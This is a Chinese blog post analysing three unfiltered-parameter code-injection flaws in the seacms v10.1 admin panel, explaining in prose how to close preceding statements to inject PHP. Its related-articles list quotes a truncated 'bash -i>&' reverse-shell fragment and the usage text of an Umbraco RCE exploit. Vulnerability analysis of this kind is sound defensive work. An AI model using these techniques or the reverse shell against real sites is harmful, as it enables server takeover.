seacms v10.1后台多处RCE 分析

最新推荐文章于 2024-03-22 16:46:45 发布
最新推荐文章于 2024-03-22 16:46:45 发布
阅读量404 收藏 1
点赞数
分类专栏: 代码审计与分析 文章标签: web安全 代码审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RestoreJustice/article/details/129650247
版权

seacms v10.1后台多处RCE

漏洞详情

seacms多处存在RCE,原因都是对传入的参数未经过滤直接写入文件中执行造成的。

漏洞分析

1、后台IP安全设置处RCE

这里可以开启或关闭IP安全设置并可以指定ip,通过$v$ip参数完成设置
在这里插入图片描述
这是是将设置参数值写入data/admin/ip.php文件,完成设置

在这里插入图片描述

并且直接传入的参数拼接写入文件,没有任何过滤

在这里插入图片描述

这里构造耀执行的代码时,需要注意闭合前面的语句和注释后面的引号

在这里插入图片描述

2、后台微信公众号设置处RCE

这里也是同样的原因,没有过滤就直接写入文件

在这里插入图片描述

这里参数很多,有的为了避免XSS,还是有做html实体编码的
在这里插入图片描述
在这里插入图片描述

因为插入代码要注释掉后面的语句并且闭合前面的(不会影响页面正常,隐蔽性好。),这里选最后一个参数进行插入

在这里插入图片描述
在这里插入图片描述

3、后台会员消息通知处RCE

还是未过滤直接拼接写入
在这里插入图片描述

构造语句
在这里插入图片描述

成功执行

在这里插入图片描述

不要温顺地走进那个良夜
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PbootCMS 前台RCE漏洞复现
0xSec
12-07 3356
PbootCMS v
Seacms代码审计小结(后台多处getshell)1
08-03
在框架中,有很多是写的是以 txt 结尾的件,这种直接读是法以 php 来解析,但是如果找到处件包含的漏洞,让他包含的是这种我们可以修改的件,那就也可以造成代码
zabbix后台RCE
weixin_44508748的博客
11-24 1331
vulhub有现成的zabbix环境 git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git cd vulhub/zabbix/CVE-2016-10134/ docker-compose up -d zabbix默认口令admin\zabbix 1.写脚本 http://1.1.1.1/zabbix/zabbix.php?action=script.edit&scriptid=4 bash -i>&
PublicCMS 后台模块 站点执行脚本RCE漏洞
shelter1234567的博客
03-22 876
PublicCMS是采用2023年主流技术开发的开源JAVACMS系统。由天津黑核科技有限公司开发,架构科学,轻松支撑上千万数据、千万PV;支持可视化编辑,多维扩展,全文搜索,全站静态化,SSI,动态页面局部静态化,URL规则完全自定义等为您快速建站,建设大规模站点提供强大驱动,也是企业级项目产品原型的良好选择。项目地址。
LightCMS全版本后台RCE 0day分析1
08-03
这个 0day 是个 Phar 反序列化打 Laravel RCE 的洞,因此需要能够将 phar 件上传,在后台的内容管理中不难发现图像上传位点查看其 HTM
CVE-2021-40904——CheckMk后台RCE
热门推荐
LiBai'S BLOG
04-10 1万+
CVE-2021-40904 漏洞描述 CheckMk Raw Edition(版本 1.5.0 到 1.5.0p25)的 Web 管理控制台允许错误配置允许嵌入 php 代码的 Web 应用程序 Dokuwiki(默认安装)。结果,实现了远程代码执行。成功的利用需要使用有效凭据或具有管理员角色的用户劫持会话来访问 Web 管理界面。 影响版本 从 1.5.0 到 1.5.0p25 攻击类型 RCE 解决方案 升级到 1.6 或更高版本 时间线 2021-09-01 发现问题。 2021-09-06 第
74CMS_v5.0.1后台RCE分析1
08-03
【74CMS_v5.0.1后台RCE分析】主要涉及的是74CMS内容管理系统的一个远程代码执行(Remote Code Execution, RCE)漏洞。这个漏洞发生在系统的后台管理部分,需要用户具有管理员权限才能利用。漏洞的触发点在于系统允许...
rConfig v3.9.2 RCE漏洞分析1
08-03
rConfig v3.9.2中的远程命令执行(RCE)漏洞分析 rConfig是一款开源的网络设备配置管理软件,它为网络工程师提供了便捷的方式来管理和备份网络设备配置。然而,这款软件在特定版本中存在两个严重的安全漏洞,允许...
[0day]通达 OA v11.7 后台 SQL 注入到 RCE1
08-03
通达 OA v11.7 后台 SQL 注入到 RCE 通达 OA v11.7 版本存在后台 SQL 注入漏洞,攻击者可以通过构造特殊的 SQL 语句,绕过安全机制,获取数据库权限,并最终获得远程代码执行(RCE)权限。 知识点一:SQL 注入漏洞...
Nacos JRaft Hessian 反序列化 RCE 分析.pdf
最新发布
04-22
通过以上分析可以看出,Nacos JRaft Hessian 反序列化 RCE 分析是一个复杂的技术过程,涉及到多个技术细节和安全考虑。开发者和运维人员需要深入了解其工作原理,才能更好地预防和解决类似的安全问题。
Umbraco-RCE:Umbraco CMS 7.12.4-(已认证)远程执行代码
03-21
Umbraco RCE漏洞利用/ PoC Umbraco CMS 7.12.4-(已认证)远程执行代码 [ ] [ ] 用法 $ python exploit.py -h usage: exploit.py [-h] -u USER -p PASS -i URL -c CMD [-a ARGS] Umbraco authenticated RCE optional arguments: -h, --help show this help message and exit -u USER, --user USER username / email -p PASS, --password PASS password -i URL, --host URL root URL -c CMD, --comman
漏洞解决办法是_SEACMS 代码审计后台漏洞两则
weixin_39960793的博客
01-14 236
本文作者:ZiNG(信安之路核心成员)特殊时期在家都无聊死了,到 CNVD 的网站上看到 seacms 出了一个鸡肋后台的 SQL 注入。想来闲来无事,就下载一套源码看看。漏洞成因很简单很简单,那为啥又要有这篇呢,只是记一下漏洞点,没准以后用的上。漏洞定位根据 CNVD 公开出来的描述,以及参照源码的目录结构,漏洞点是在 admin\admin_pay.php。说明一下,在程序安装完成后...
JD-FreeFuck 后台RCE漏洞
weixin_51387754的博客
11-05 8532
漏洞简介 RCE英文全称:remote command/code execute 分为远程命令执行ping和远程代码执行evel。 漏洞出现的原因:没有在输入口做输入处理。 我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。其实这就是一个接口,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统,这就是RCE漏洞。 漏洞复现 fofa语法
seacms_v6.4(海洋cms)前台RCE 分析
RestoreJustice的博客
03-19 1006
在common.php中对GET,POST,COOKIE等请求传入的全局变量中的键值对转换成变量,并对其中的值使用addslashes()转义预定义的特殊符号。在eval()函数中,首先要闭合前面的if语句,可以构造1)phpinfo();首先search.php入手,这个文件包含了common.php和main.class.php。参数没做严格的限制,就将其传入了模板文件中,然后使用eval()执行模板中包含。的代码,通过闭合拼接语句的方式,插入恶意代码,实现远程命令执行。在eval()函数中,
某微1day后台RCE审计漏洞
渗透测试研究中心
12-30 1083
某应用存在后台RCE,根据相关信息,我们在对后台审计过程,这里发现一处调用newInstance实例化溯源找到InterfaceRegisterCustomOperationCmd #excute访问路径为 /api/integration/workflowflow/getInterfaceRegisterCustomOperationgetInterfaceRegisterCustomOper...
74CMS的RCE挖掘思路
include_voidmain的博客
04-06 2742
0x01 前言 在漏洞挖掘时发现了一个RCE漏洞,这个漏洞的发掘,利用过程比较有趣,和大家分享一下~ 实际上在半个月前,本人发布了一篇关于DedeCMS前端RCE分析并扩展RCE挖掘思路的文章。这篇文章中DedeCMS这个前端RCE出现的问题在于,浏览器发送至服务器数据包中的referer并没有进行过滤,并且将referer中的内容写入cache,然后include包含至当前文件,造成了代码注入,实现了RCE。在这里,执行并没有用eval,shell_exec,exec之类的危险函数,而是在于include
某CMS的RCE漏洞分析-适用于新手
2301_80115097的博客
10-30 114
Github上面一个开源的JAVA CMS系统( [Public CMS](https://github.com/sanluan/PublicCMS) ),该系统存在一处任意命令执行(漏洞现已修复),记录下该漏洞的分析过程以及遇到类似的CMS系统我们还可以从哪些点进行漏洞挖掘。Github上面一个开源的JAVA CMS系统( Public CMS ),该系统存在一处任意命令执行(漏洞现已修复),记录下该漏洞的分析过程以及遇到类似的CMS系统我们还可以从哪些点进行漏洞挖掘。
【漏洞复现-seaCms-命令执行】vulfocus/seacms-cnvd_2020_22721
10-15 1706
seaCms-命令执行】后门代码写入可解析文件中
seacms海洋cms漏洞
YouthBelief的博客
10-29 5705
seacms海洋cms漏洞前言一、seacms 远程命令执行 (CNVD-2020-22721)0x01 漏洞描述0x02 漏洞利用拿shell总结 前言 海洋CMS一套程序自适应电脑、手机、平板、APP多个终端入口。 一、seacms 远程命令执行 (CNVD-2020-22721) 0x01 漏洞描述 SeaCMS v10.1存在命令执行漏洞,在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限。 后台
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值